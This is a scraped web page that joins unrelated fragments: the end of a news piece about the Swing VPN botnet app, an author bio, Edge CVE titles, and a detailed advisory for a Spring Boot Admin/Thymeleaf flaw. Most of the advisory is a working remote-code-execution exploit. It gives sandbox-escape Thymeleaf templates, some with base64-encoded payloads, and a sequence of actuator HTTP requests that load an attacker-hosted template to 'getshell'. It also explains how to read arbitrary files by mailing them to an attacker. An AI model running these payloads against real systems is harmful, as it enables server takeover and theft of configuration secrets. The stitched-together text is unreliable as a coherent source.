As the digital landscape continues to evolve, staying informed and vigilant against cyber threats is crucial. The Swing VPN incident serves as a reminder that even seemingly legitimate apps can harbour dangerous intentions, making it essential for users to prioritize their online safety.

If you suspect any app or service is engaging in malicious behaviour, report it to the respective app store or platform immediately. By working together, users, researchers, and tech companies can create a safer digital environment for everyone.

If you are an Android user, you can follow this **link** to report an app or an app developer. For iOS users, this **link** can be helpful.

1.  Fake GitHub Repos Delivering Malware as PoCs
2.  Google kicks out 600 malicious apps from Play Store
3.  Apple removed all major VPN apps from Chinese App Store
4.  Google removes ClearURLs Chrome extension from its store
5.  Google Fails To Remove “App Developer” Behind Malware Scam

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Google Removes Swing VPN Android App Exposed as DDoS Botnet

Microsoft Edge for Android (Chromium-based) Tampering Vulnerability

CVE-2023-36888

Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability

CVE-2023-36887

Thymeleaf through 3.1.1.RELEASE, as used in spring-boot-admin (aka Spring Boot Admin) through 3.1.1 and other products, allows sandbox bypass via crafted HTML. This may be relevant for SSTI (Server Side Template Injection) and code execution in spring-boot-admin if MailNotifier is enabled and there is write access to environment variables via the UI.

**Impact**

All users who run Spring Boot Admin Server, having enabled MailNotifier and write access to environment variables via UI are possibly affected.

The vulnerability affects the product and version range：

    # 2023-07-05
    spring-boot-admin <= 3.1.0
    thymeleaf <= 3.1.1.RELEASE
    

**RCE POC**

all the proof environment is provided from this github repository.

when you started the springboot-admin environment,then you can follow the steps as below to getshell:

first, write a html named poc3.html:

<!DOCTYPE html\>
<html xmlns:th\="http://www.thymeleaf.org"\>
<head\>
    <meta http-equiv\="Content-Type" content\="text/html; charset=UTF-8"/>
</head\>
<body\>

<tr
        th:with\="getRuntimeMethod=${T(org.springframework.util.ReflectionUtils).findMethod(T(org.springframework.util.ClassUtils).forName('java.lang.Runtime',T(org.springframework.util.ClassUtils).getDefaultClassLoader()), 'getRuntime' )}"
\>
    <td\>
        <a
                th:with\="runtimeObj=${T(org.springframework.util.ReflectionUtils).invokeMethod(getRuntimeMethod, null)}"
        \>
            <a
                    th:with\="exeMethod=${T(org.springframework.util.ReflectionUtils).findMethod(T(org.springframework.util.ClassUtils).forName('java.lang.Runtime',T(org.springframework.util.ClassUtils).getDefaultClassLoader()), 'exec', ''.getClass() )}"
            \>
                <a
                        th:with\="param2=${T(org.springframework.util.ReflectionUtils).invokeMethod(exeMethod, runtimeObj, 'calc' )
                }"
                        th:href\="${param2}"
                \></a\>
            </a\>

        </a\>
    </td\>
</tr\>

</body\>
</html\>

then put the poc3.html into your VPS,and start a HTTPServer which the spring-boot-admin app can access.

and then send this HTTP package to enable MailNotifier:

    POST /actuator/env HTTP/1.1
    Host: 127.0.0.1:8080
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5163.147 Safari/537.36
    Accept: application/json
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    X-SBA-REQUEST: true
    Connection: close
    Referer: http://127.0.0.1:8080/
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    sec-ch-ua-platform: "macOS"
    sec-ch-ua: "Google Chrome";v="108", "Chromium";v="108", "Not=A?Brand";v="24"
    sec-ch-ua-mobile: ?0
    Content-Type: application/json
    Content-Length: 63
    
    {"name":"spring.boot.admin.notify.mail.enabled","value":"true"}
    

send this HTTP package to modify the email template, which is our malicious html file's address.

    POST /actuator/env HTTP/1.1
    Host: 127.0.0.1:8080
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5163.147 Safari/537.36
    Accept: application/json
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    X-SBA-REQUEST: true
    Connection: close
    Referer: http://127.0.0.1:8080/
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    sec-ch-ua-platform: "macOS"
    sec-ch-ua: "Google Chrome";v="108", "Chromium";v="108", "Not=A?Brand";v="24"
    sec-ch-ua-mobile: ?0
    Content-Type: application/json
    Content-Length: 91
    
    {"name":"spring.boot.admin.notify.mail.template","value":"http://127.0.0.1:4578/poc3.html"}
    

send this HTTP package to refresh the modify:

    POST /actuator/refresh HTTP/1.1
    Host: 127.0.0.1:8080
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5163.147 Safari/537.36
    Accept: application/json
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    X-SBA-REQUEST: true
    Connection: close
    Referer: http://127.0.0.1:8080/
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    sec-ch-ua-platform: "macOS"
    sec-ch-ua: "Google Chrome";v="108", "Chromium";v="108", "Not=A?Brand";v="24"
    sec-ch-ua-mobile: ?0
    Content-Type: application/json
    Content-Length: 2
    
    {}
    

finally,send this HTTP package to the spring-boot-admin app to trigger offline notification,and you will getshell immediately.

    POST /instances HTTP/1.1
    Accept: application/json
    Content-Type: application/json
    User-Agent: Java/17.0.6
    Host: 127.0.0.1:8080
    Content-Length: 178
    
    {"name":"test","managementUrl":"http://127.0.0.1:1","healthUrl":"http://127.0.0.1:1","serviceUrl":"http://127.0.0.1:1","metadata":{"startup":"2024-09-04T14:49:12.6694287+08:00"}}
    

**Arbitrary-file-read POC**

When you have configured mail notifications success,for example：

then you can configure the template attribute of MailNotifier to be a local file of the springboot-admin host or a file under the classpath of the springboot-admin app, and then modify the recipient of MailNotifier to be a malicious attacker. When an email notification is triggered, the malicious attacker will receive the corresponding template attribute files, resulting in arbitrary file reads.

if you modify the template attribute of MailNotifier to be a file under the classpath of the springboot-admin app, you even can get the application.properties file.

**Vulnerability analysis**

The reason for the vulnerability is that springboot-admin uses thymeleaf for HTML rendering, and thymeleaf has a sandbox bypass vulnerability. If thymeleaf renders a malicious HTML, RCE can be caused by using the thymeleaf sandbox to escape; at the same time, if the attacker can use the actuator to The template attribute of MailNotifier is changed to a remote html template, then springboot-admin will load malicious html from the attacker's server and use thymeleaf to render it, thus causing RCE; if the template attribute of MailNotifier is modified to the server's local file or classpath will cause arbitrary file reading;

The key positions of using thymeleaf to render HTML in springboot-admin are as follows:

If "this.template" is modified to a remote file, such as "http://xxx.xx/poc.html", then the html file will be loaded from the remote and rendered. With the sandbox escape vulnerability of thymeleaf, RCE can be performed;

The following are three thymeleaf sandbox escape pocs:

1.  This poc applies to versions prior to JDK9:

<!DOCTYPE html\>
<html xmlns:th\="http://www.thymeleaf.org"\>
<head\>
    <meta http-equiv\="Content-Type" content\="text/html; charset=UTF-8"/>
</head\>
<body\>

<tr
        th:with\="defineClassMethod=${T(org.springframework.util.ReflectionUtils).findMethod(T(org.springframework.util.ClassUtils).forName('org.springframework.cglib.core.ReflectUtils',T(org.springframework.util.ClassUtils).getDefaultClassLoader()), 'defineClass', ''.getClass() ,''.getBytes().getClass(), T(org.springframework.util.ClassUtils).forName('java.lang.ClassLoader',T(org.springframework.util.ClassUtils).getDefaultClassLoader()) )}"
\>
    <td\>
        <a
                th:with\="param2=${T(org.springframework.util.ReflectionUtils).invokeMethod(defineClassMethod, null,
                    'fun.pinger.Hack',
                    T(org.springframework.util.Base64Utils).decodeFromString('yv66vgAAADQAKgoACQAYCgAZABoIABsKABkAHAcAHQcAHgoABgAfBwAoBwAhAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAAZMSGFjazsBAAg8Y2xpbml0PgEAAWUBABVMamF2YS9pby9JT0V4Y2VwdGlvbjsBAA1TdGFja01hcFRhYmxlBwAdAQAKU291cmNlRmlsZQEACUhhY2suamF2YQwACgALBwAiDAAjACQBAARjYWxjDAAlACYBABNqYXZhL2lvL0lPRXhjZXB0aW9uAQAaamF2YS9sYW5nL1J1bnRpbWVFeGNlcHRpb24MAAoAJwEABEhhY2sBABBqYXZhL2xhbmcvT2JqZWN0AQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEAGChMamF2YS9sYW5nL1Rocm93YWJsZTspVgEAD2Z1bi9waW5nZXIvSGFjawEAEUxmdW4vcGluZ2VyL0hhY2s7ACEACAAJAAAAAAACAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAAwAOAAAADAABAAAABQAPACkAAAAIABEACwABAAwAAABmAAMAAQAAABe4AAISA7YABFenAA1LuwAGWSq3AAe/sQABAAAACQAMAAUAAwANAAAAFgAFAAAABwAJAAoADAAIAA0ACQAWAAsADgAAAAwAAQANAAkAEgATAAAAFAAAAAcAAkwHABUJAAEAFgAAAAIAFw=='),
                    new org.springframework.core.OverridingClassLoader(T(org.springframework.util.ClassUtils).getDefaultClassLoader()) )
                }"
                th:href\="${param2}"
        \></a\>
    </td\>
</tr\>

</body\>
</html\>

2.  This POC applies to versions after JDK9:

<!DOCTYPE html\>
<html xmlns:th\="http://www.thymeleaf.org"\>
<head\>
    <meta http-equiv\="Content-Type" content\="text/html; charset=UTF-8"/>
</head\>
<body\>

<tr
        th:with\="createMethod=${T(org.springframework.util.ReflectionUtils).findMethod(T(org.springframework.util.ClassUtils).forName('jdk.jshell.JShell',T(org.springframework.util.ClassUtils).getDefaultClassLoader()), 'create' )}"
\>
    <td\>
        <a
                th:with\="shellObj=${T(org.springframework.util.ReflectionUtils).invokeMethod(createMethod, null)}"
        \>
            <a
                    th:with\="evalMethod=${T(org.springframework.util.ReflectionUtils).findMethod(T(org.springframework.util.ClassUtils).forName('jdk.jshell.JShell',T(org.springframework.util.ClassUtils).getDefaultClassLoader()), 'eval', ''.getClass() )}"
            \>
                <a
                        th:with\="param2=${T(org.springframework.util.ReflectionUtils).invokeMethod(evalMethod, shellObj,  new java.lang.String(T(org.springframework.util.Base64Utils).decodeFromString('amF2YS5sYW5nLlJ1bnRpbWUuZ2V0UnVudGltZSgpLmV4ZWMoImNhbGMiKQ==')))
                }"
                        th:href\="${param2}"
                \></a\>
            </a\>

        </a\>
    </td\>
</tr\>

</body\>
</html\>

3.  This POC is applicable to all versions of JDK:

<!DOCTYPE html\>
<html xmlns:th\="http://www.thymeleaf.org"\>
<head\>
    <meta http-equiv\="Content-Type" content\="text/html; charset=UTF-8"/>
</head\>
<body\>

<tr
        th:with\="getRuntimeMethod=${T(org.springframework.util.ReflectionUtils).findMethod(T(org.springframework.util.ClassUtils).forName('java.lang.Runtime',T(org.springframework.util.ClassUtils).getDefaultClassLoader()), 'getRuntime' )}"
\>
    <td\>
        <a
                th:with\="runtimeObj=${T(org.springframework.util.ReflectionUtils).invokeMethod(getRuntimeMethod, null)}"
        \>
            <a
                    th:with\="exeMethod=${T(org.springframework.util.ReflectionUtils).findMethod(T(org.springframework.util.ClassUtils).forName('java.lang.Runtime',T(org.springframework.util.ClassUtils).getDefaultClassLoader()), 'exec', ''.getClass() )}"
            \>
                <a
                        th:with\="param2=${T(org.springframework.util.ReflectionUtils).invokeMethod(exeMethod, runtimeObj, 'calc' )
                }"
                        th:href\="${param2}"
                \></a\>
            </a\>

        </a\>
    </td\>
</tr\>

</body\>
</html\>

**Workarounds**

*   Disable any MailNotifier
*   Disable write access (POST request) on /env actuator endpoint
*   Limit the template attribute of MailNotifier to a few specific options, and avoid using the http:// or file:/// protocol

Tag

#chrome